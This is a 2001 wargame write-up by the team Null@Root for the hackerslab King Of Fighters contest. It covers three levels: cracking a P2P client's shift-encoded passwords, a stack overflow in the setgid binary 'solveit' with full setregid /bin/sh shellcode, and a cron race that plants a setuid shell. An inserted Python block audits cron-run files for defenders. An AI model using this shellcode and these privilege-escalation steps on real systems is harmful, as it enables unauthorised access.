King Of Fighters 2001
The Best of Best HackerGroup Null@Root
Level 1
• Environment :
  Zolazola.exe : P2P Communication Program
• Target :
  http://kof.hackerslab.org/cgi-bin/level1/idaccess.cgi
- 1 -
2001/09/06
Level 1 (continue)
• Finding Vulnerability
  – String from zolazola Executable File
    • ID : guest
    • Password : gZuOeLsAt
  – Packet sniffing
    • Server : 203.239.xxx.xxx : 2900
    • Command list
      – KOFLOG, KOFGETLIST, KOFMESSAGE, KOFGETINFO
      – KOFOK, KOFFRI, KOFPUTERR, KOFPUTINFO
Level 1 (continue)
  Client PC --> Server    KOFLOG guest dXtOfNuEy
  Client PC --> Server    KOFGETLIST guest
  Server --> Client PC    KOFOK 0
  Server --> Client PC    KOFPUTERR level1
  Server --> Client PC    KOFFRI level1 / KOFFRI level2 / KOFFRI guest
  Client PC --> Server    KOFMSG guest level1 Hi! are you there?
  Client PC --> Server    KOFGETINFO guest level1
Level 1 (continue)
• ATTACK
  telnet 203.255.xxx.xxx 2900
  KOFGETINFO guest guest                 (I want guest’s information.)
  KOFPUTINFO guest eYuPgOwFz gZuOeLsAt
  KOFGETLIST level2                      (Who is level2’s friend?)
  KOFFRI kof_moniter
  KOFGETINFO kof_moniter level2
  KOFPUTINFO level2 eDttvdvYQVn [email protected] level2user
  KOFPUTINFO level2 fEuuwewZRWo [email protected] level2user
  KOFPUTINFO level2 gFvvxfx[SXp [email protected] level2user
  KOFPUTINFO level2 eDttvdvYQVn [email protected] level2user
Level 1 (continue)
• ENCODE
  plain     g  Z  u  O  e  L  s  A  t
  encoded   e  Y  u  P  g  O  w  F  z
  shift    -2 -1  0 +1 +2 +3 +4 +5 +6

  plain     g  Z  u  O  e  L  s  A  t
  encoded   d  X  t  O  f  N  u  E  y
  shift    -3 -2 -1  0 +1 +2 +3 +4 +5
Level 1 (continue)
• DECODE
  #include <stdio.h>
  #include <string.h>

  int main(int argc, char **argv)
  {
      int i, j, dy;
      int src_len;
      char *src, ch;

      if (argc < 2)
          return 1;
      src = argv[1];
      src_len = strlen(src);
      /* try every possible start offset i : candidate i is src[j] + (i - j) */
      for (i = 0; i < src_len; i++) {
          for (j = 0, dy = i; j < src_len; j++, dy--) {
              ch = *(src + j);
              printf("%c", ch + dy);
          }
          printf("\n");
      }
      return 0;
  }
• Result
  $ ./dec1 eDttvdvYQVn
  eCrqr_pRIMd
  fDsrs`qSJNe
  gEtstarTKOf
  hFutubsULPg
  iGvuvctVMQh
  jHwvwduWNRi
  kIxwxevXOSj
  lJyxyfwYPTk
  mKzyzgxZQUl
  nL{z{hy[RVm
  oM|{|iz\SWn
  pN}|}j{]TXo
  level2’s password
Level 1 (complete)
Conguratulations!
The IP for the next level is 203.255.xxx.xxx.
And ID is h3047.
Level 2
• Environment
  Server : Linux kernel 2.4.9 (203.255.xxx.xxx)
  GCC : egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
• Target : /usr/local/apache/cgi-bin/idaccess.cgi
Level 2 (continue)
• Finding Vulnerability
  /usr/games directory File list
  drwxrwxr-x   3 root   level2 352256 Aug 25 17:50 .
  drwxr-xr-x  19 root   root     4096 Aug 23 22:38 ..
  -rw-rw----   1 level2 level2     98 Aug 25 17:50 check
  -rw-r--r--   1 level2 level2    763 Aug 25 17:50 score
  -rw-r-----   1 h3579  level2      0 Aug 25 17:50 score.13210
  -rwxr-sr-x   1 root   level2  17542 Aug 25 06:20 solveit
Level 2 (continue)
– Solveit works like this :
  Input ID : (input id --- up to 129byte)
  (123+456)*789-(456+123)*789 = (Input Result)
  (nn1+nn2)*nn3-(nn4+nn5)*nn6 = (Input Result)      ... 20 times
  Do you play again(y/n)? (Input Data)
Level 2 (continue)
• Information from Solveit binary file
  ID Field input length : up to 129byte, start at ebp + 0xffffff78
  0x8048d0d <main+157>: push   $0x81                   <-- Length (0x81 = 129)
  0x8048d12 <main+162>: lea    0xffffff78(%ebp),%eax   <-- start position
  0x8048d18 <main+168>: push   %eax
  0x8048d19 <main+169>: push   $0x8049005
  0x8048d1e <main+174>: call   0x8048854 <get_input>
  (gdb) x/bs 0x8049005
  0x8049005 <_IO_stdin_used+225>: "Input your id: "
Level 2 (continue)
• Last question input length is affected by ID Field’s last byte
  (the ID buffer at ebp-0x88 is 129 bytes long, so its last byte is the low byte of the length variable at ebp-0x8)
  0x8048db7 <main+327>: mov    0xfffffff8(%ebp),%eax   <-- get_yn’s length
  0x8048dba <main+330>: push   %eax
  0x8048dbb <main+331>: push   $0x8049042
  0x8048dc0 <main+336>: call   0x80488c0 <get_yn>
  0x8048dc5 <main+341>: add    $0x8,%esp
  (gdb) x/bs 0x8049042
  0x8049042 <_IO_stdin_used+286>: "Do you play again? (y/n) "
Level 2 (continue)
• Function get_yn uses 4byte of stack
  get_input(prompt, buf, len) is then called with the caller-supplied length on the 4byte buffer at ebp-4.
  Dump of assembler code for function get_yn:
  0x80488c0 <get_yn>:    push   %ebp
  0x80488c1 <get_yn+1>:  mov    %esp,%ebp
  0x80488c3 <get_yn+3>:  sub    $0x4,%esp                <-- get_yn’s stack (4byte)
  0x80488c6 <get_yn+6>:  push   $0x4
  0x80488c8 <get_yn+8>:  push   $0x0
  0x80488ca <get_yn+10>: lea    0xfffffffc(%ebp),%eax
  0x80488cd <get_yn+13>: push   %eax
  0x80488ce <get_yn+14>: call   0x8048730 <memset>
  0x80488d3 <get_yn+19>: add    $0xc,%esp
  0x80488d6 <get_yn+22>: mov    0xc(%ebp),%eax
  0x80488d9 <get_yn+25>: push   %eax
  0x80488da <get_yn+26>: lea    0xfffffffc(%ebp),%eax
  0x80488dd <get_yn+29>: push   %eax
  0x80488de <get_yn+30>: mov    0x8(%ebp),%eax
  0x80488e1 <get_yn+33>: push   %eax
  0x80488e2 <get_yn+34>: call   0x8048854 <get_input>
Level 2 (continue)
• ATTACK for level2’s gid shell
• Modify setreuid shell code to setregid shell code ( setreuid(0,0) -> setregid(501,501) )
  \x31\xdb\x31\xc9\xf7\xe3\x66\x81\xc3\xf5\x01\x66\x81\xc1\xf5\x01\xb0\x47\xcd\x80\x31\xdb\x31\xc9\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80
• Attack string format
  [Nop+setregid shell+Nop]+[math quiz answer]+[AAAA][ebp][return Address]
   ^-- 129byte
Level 2 (continue)
• Attack string
  (printf "…"; cat) | ./solveit
Level 2 (continue)
• We could modify main.html of level2 with level2 gid privilege, but the “Target” needs level2 uid.
• Finding other Vulnerability
  • /usr/games/check file.
    sh-2.04$ cat check
    for file in /usr/games/score.* ; do /bin/cat $file >> /usr/games/score ; /bin/rm -f $file ; done
• level2’s Cron Job does like this :
  rm check
  make check
  do check
Level 2 (continue)
• ATTACK for level2’s uid shell
  /var/spool/cron/crontabs/level2 had a race condition.
  Cron (at every 10 min) :
    rm check
    make check
    do check
  Attacker : replace check file (include myjob)
Level 2 (continue)
– Prepared setreuid shell (binary file : /tmp/wsh)
  #include <unistd.h>
  #include <stdlib.h>

  int main(void)
  {
      setreuid(501, 501);   /* level2 uid */
      system("/bin/sh");
      return 0;
  }
– Attack script (filename : exp.sh)
  echo > /usr/games/check
  cp /tmp/wsh /tmp/nullroot; chmod 4755 /tmp/nullroot
  ./exp.sh
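A defender's check for the condition these slides exploit, added here as an example and not part of the Null@Root slides: a cron job that executes a script which its own group, or anyone who can write the directory holding it, is able to replace. The code parses ls -l mode strings like the /usr/games listing above and reports why that check file was unsafe; parse_ls_mode, audit_cron_target and audit_path are names of this example, and uid 501 for level2 is taken from the setreuid(501,501) call on the slides.

```python
# Added example, not from the Null@Root slides: audit a file that a cron job
# executes (like /usr/games/check).  Write access for anyone other than root or
# the cron user, on the file or on its directory, means running code as that user.
import os
import stat

_RWX_BITS = (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
             stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
             stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH)
_SPECIAL_BITS = (stat.S_ISUID, stat.S_ISGID, stat.S_ISVTX)

def parse_ls_mode(text):
    """Convert an ls -l mode column such as '-rwxr-sr-x' into st_mode bits."""
    mode = 0
    for pos, (ch, bit) in enumerate(zip(text[1:10], _RWX_BITS)):
        if ch in "rwx":
            mode |= bit
        elif ch in "sStT":                 # setuid / setgid / sticky column
            if ch.islower():               # lowercase also means execute is set
                mode |= bit
            mode |= _SPECIAL_BITS[pos // 3]
    return mode

def audit_cron_target(mode, uid, dir_mode, dir_uid, cron_uid):
    """Return the reasons a cron-executed file at (mode, uid) inside a directory
    at (dir_mode, dir_uid) can be replaced by someone other than cron_uid/root."""
    findings = []
    if mode & stat.S_IWGRP:
        findings.append("script is group-writable")
    if mode & stat.S_IWOTH:
        findings.append("script is world-writable")
    if uid not in (0, cron_uid):
        findings.append("script not owned by root or the cron user")
    # a writable, non-sticky directory lets others unlink and recreate the file
    if dir_mode & (stat.S_IWGRP | stat.S_IWOTH) and not dir_mode & stat.S_ISVTX:
        findings.append("directory is writable by group/others without sticky bit")
    if dir_uid not in (0, cron_uid):
        findings.append("directory not owned by root or the cron user")
    return findings

def audit_path(path, cron_uid):
    st = os.stat(path)                     # same audit against a live path
    dst = os.stat(os.path.dirname(os.path.abspath(path)))
    return audit_cron_target(st.st_mode, st.st_uid, dst.st_mode, dst.st_uid, cron_uid)

if __name__ == "__main__":
    # constructed from the slide's listing; level2 = uid 501 (setreuid(501,501) on the slides)
    check_mode = parse_ls_mode("-rw-rw----")     # check, owner level2
    games_mode = parse_ls_mode("drwxrwxr-x")     # /usr/games, owner root
    for finding in audit_cron_target(check_mode, 501, games_mode, 0, 501):
        print("/usr/games/check:", finding)
```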
Level 2 (complete)
Congraturation!, You passed level 2. Now challenge level 3 system !!
level3 system's IP adress is 203.255.xxx.xxx
Make your page in /usr/local/apache/htdocs/main.html
You can connect to the level3 server's telnet service with your ID and password.
After obtaining root privileges on the level3 system, run the program named idaccess on the level3 server.
Now challenge level 3 system !!
You can connect level 3 system's telnet service,
by using your "Registration Number" and password.
You must get a root privilege, and find a excutable file "idaccess" in any location in level 3 system
After that, if you excute "idaccess" and input your registration information.
then you will get qualification for passing level 3,
Level 3
• Environment :
Server : Solaris 5.8 i386 (203.255.xxx.xxx)
GCC: 2.9x
• Target :
??
Level 3
1. Checking vulnerability
1.1 search known bug
1.2 port scan
1.3 search setuid root file
1.4 boot sequence check
2. Found login problem ( 202byte login ID )
   attack string format
   [ serial_no(13) + nop(95) + shell code(93) + return address(4) ]
3. We did not have enough time to exploit it, so we gave up level3 and defended level2’s homepage.
<After-talk of KOF>
- We worried about p2p on the eve of that game.
- Level2 was not so easy to solve directly.
- There were no special privileges to keep main.html of level2.
- Players need some attention for their work; script kiddies copied solveit's exploit from /tmp.
- Anybody can get level2's uid by peeking at the /usr/games/check file.
- Level3 was difficult for us because we didn't have so much experience with Solaris.
- We thought all of the levels were very nice, thanks to hackerslab.